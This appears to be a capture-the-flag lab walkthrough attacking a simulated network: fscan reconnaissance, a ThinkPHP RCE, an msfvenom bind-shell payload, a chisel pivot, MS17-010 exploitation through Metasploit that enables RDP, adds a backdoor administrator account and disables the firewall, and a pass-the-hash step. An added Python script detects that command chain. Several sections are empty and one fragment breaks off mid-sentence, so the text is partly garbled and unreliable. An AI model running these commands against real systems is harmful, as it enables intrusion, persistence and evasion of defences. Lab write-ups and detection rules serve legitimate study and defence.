Fscan #
[root@Hacking] /home/kali/Desktop
❯ ./fscan -h 192.168.10.10 -p 80 ⏎
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-07-16 22:41:57] [INFO] 暴力破解线程数: 1
[2025-07-16 22:41:57] [INFO] 开始信息扫描
[2025-07-16 22:41:57] [INFO] 最终有效主机数量: 1
[2025-07-16 22:41:57] [INFO] 开始主机扫描
[2025-07-16 22:41:57] [INFO] 有效端口数量: 1
[2025-07-16 22:41:57] [SUCCESS] 端口开放 192.168.10.10:80
[2025-07-16 22:42:03] [SUCCESS] 服务识别 192.168.10.10:80 => [http]
[2025-07-16 22:42:03] [INFO] 存活端口数量: 1
[2025-07-16 22:42:03] [INFO] 开始漏洞扫描
[2025-07-16 22:42:03] [INFO] 加载的插件: webpoc, webtitle
[2025-07-16 22:42:04] [SUCCESS] 网站标题 http://192.168.10.10 状态码:200 长度:25157 标题:易优CMS - Powered by Eyoucms.com
[2025-07-16 22:42:11] [SUCCESS] 目标: http://192.168.10.10:80
漏洞类型: poc-yaml-thinkphp5023-method-rce
漏洞名称: poc1
详细信息:
links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce
[2025-07-16 22:42:14] [SUCCESS] 扫描已完成: 2/2
The scan shows that the target has a ThinkPHP RCE vulnerability.
Thinkphp RCE #
Hashdump #
Upload an msf payload and connect to it.
[root@Hacking] /home/kali/lab1
❯ msfvenom -p windows/x64/meterpreter/bind_tcp LHOST=0.0.0.0 LPORT=4444 -f exe > shell.exe ⏎
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 496 bytes
Final size of exe file: 7168 bytes
Internal network scan #
Checking the machine's IP information reveals another address, 192.168.20.10.
*Evil-WinRM* PS C:\Users\Administrator\Documents> .\fscan.exe -h 192.168.20.10/24
fscan.exe :
+ CategoryInfo : NotSpecified: (:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 192.168.20.10 is alive
(icmp) Target 192.168.20.20 is alive
(icmp) Target 192.168.20.30 is alive
[*] Icmp alive hosts len is: 3
192.168.20.20:135 open
192.168.20.30:88 open
192.168.20.10:3306 open
192.168.20.30:445 open
192.168.20.20:445 open
192.168.20.10:445 open
192.168.20.30:139 open
192.168.20.20:139 open
192.168.20.10:139 open
192.168.20.30:135 open
192.168.20.10:135 open
192.168.20.10:80 open
[*] alive ports len is: 12
start vulscan
[*] NetBios 192.168.20.10 WORKGROUP\WIN-KOHRC1DGOL9 Windows Server 2012 R2 Standard 9600
[*] NetInfo
[*]192.168.20.20
[->]cyberweb
[->]192.168.20.20
[+] MS17-010 192.168.20.30 (Windows Server 2008 R2 Standard 7600)
[*] NetInfo
[*]192.168.20.30
[->]WIN-7NRTJO59O7N
[->]192.168.20.30
[+] MS17-010 192.168.20.20 (Windows Server 2012 R2 Standard 9600)
[*] NetBios 192.168.20.20 cyberweb.cyberstrikelab.com Windows Server 2012 R2 Standard 9600
[*] WebTitle http://192.168.20.10 code:200 len:25157 title:鏄撲紭CMS - Powered by Eyoucms.com
[+] PocScan http://192.168.20.10 poc-yaml-thinkphp5023-method-rce poc1
The scan results show that 192.168.20.30 is vulnerable to EternalBlue (MS17-010). Because it sits on the internal network, a proxy is needed, so chisel is uploaded here.
MS17-010 #
proxychains -q msfconsole
msf6 auxiliary(admin/smb/ms17_010_command) > set rhost 192.168.20.30
msf6 auxiliary(admin/smb/ms17_010_command) > set command type C:\\flag.txt
set COMMAND 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'
set COMMAND net user hack Admin@123 /add
set COMMAND net localgroup Administrators hack /add
set COMMAND netsh firewall set opmode disable
Set fDenyTSConnections=0
→ Enables RDP: the registry change lifts the block on remote connections.
proxychains -q rdesktop 192.168.20.30
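The four commands pushed through ms17_010_command above (enabling RDP in the registry, creating a local user, adding it to Administrators, disabling the firewall) leave distinctive process-creation records. The following Python is an added detection example, not part of the original writeup; it assumes constructed `host|parent|command_line` records rather than a real log format, strips quotes so that cmd's `Terminal" "Server` spelling matches the same rule as `"Terminal Server"`, and rates a host showing three or more of the four as high severity.

```python
import re

# Constructed sample process-creation records (the shape of Windows Security
# 4688 / Sysmon Event ID 1 data, "host|parent|command_line"); not real log data.
SAMPLE_EVENTS = [
    r'WIN-7NRTJO59O7N|services.exe|cmd.exe /c type C:\flag.txt',
    r'WIN-7NRTJO59O7N|cmd.exe|REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f',
    r'WIN-7NRTJO59O7N|cmd.exe|net user hack Admin@123 /add',
    r'WIN-7NRTJO59O7N|cmd.exe|net localgroup Administrators hack /add',
    r'WIN-7NRTJO59O7N|cmd.exe|netsh firewall set opmode disable',
    r'WIN-KOHRC1DGOL9|explorer.exe|notepad.exe C:\notes.txt',
]

# Each rule maps a tag to a pattern applied to the quote-stripped command line,
# so cmd's  Terminal" "Server  and the usual "Terminal Server" both match.
RULES = {
    "rdp_enabled": re.compile(
        r"reg\s+add\s+hklm\\system\\currentcontrolset\\control\\terminal\s*server"
        r".*?/v\s+fdenytsconnections.*?/d\s+0+\b", re.I),
    "local_user_added": re.compile(r"\bnet1?\s+user\s+\S+\s+\S+\s+/add\b", re.I),
    "admin_group_added": re.compile(
        r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I),
    "firewall_disabled": re.compile(
        r"\bnetsh\s+(?:firewall\s+set\s+opmode\s+disable"
        r"|advfirewall\s+set\s+\w+\s+state\s+off)\b", re.I),
}


def classify(command_line: str) -> list[str]:
    """Return the rule tags that a single command line triggers."""
    normalized = command_line.replace('"', "")
    return [tag for tag, rx in RULES.items() if rx.search(normalized)]


def detect_chain(events: list[str]) -> dict[str, dict]:
    """Group hits per host; 3+ distinct tags on one host marks the full chain."""
    per_host: dict[str, dict] = {}
    for line in events:
        host, _parent, cmd = line.split("|", 2)
        tags = classify(cmd)
        if not tags:
            continue
        entry = per_host.setdefault(host, {"tags": set(), "severity": "medium"})
        entry["tags"].update(tags)
        entry["severity"] = "high" if len(entry["tags"]) >= 3 else "medium"
    return per_host


if __name__ == "__main__":
    for host, finding in detect_chain(SAMPLE_EVENTS).items():
        print(host, finding["severity"], sorted(finding["tags"]))
```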
.\
, then download the targeted trojan from the CMS host.
PTH #
Using the domain controller hash, it is possible to log in to the 192.168.20.20 host.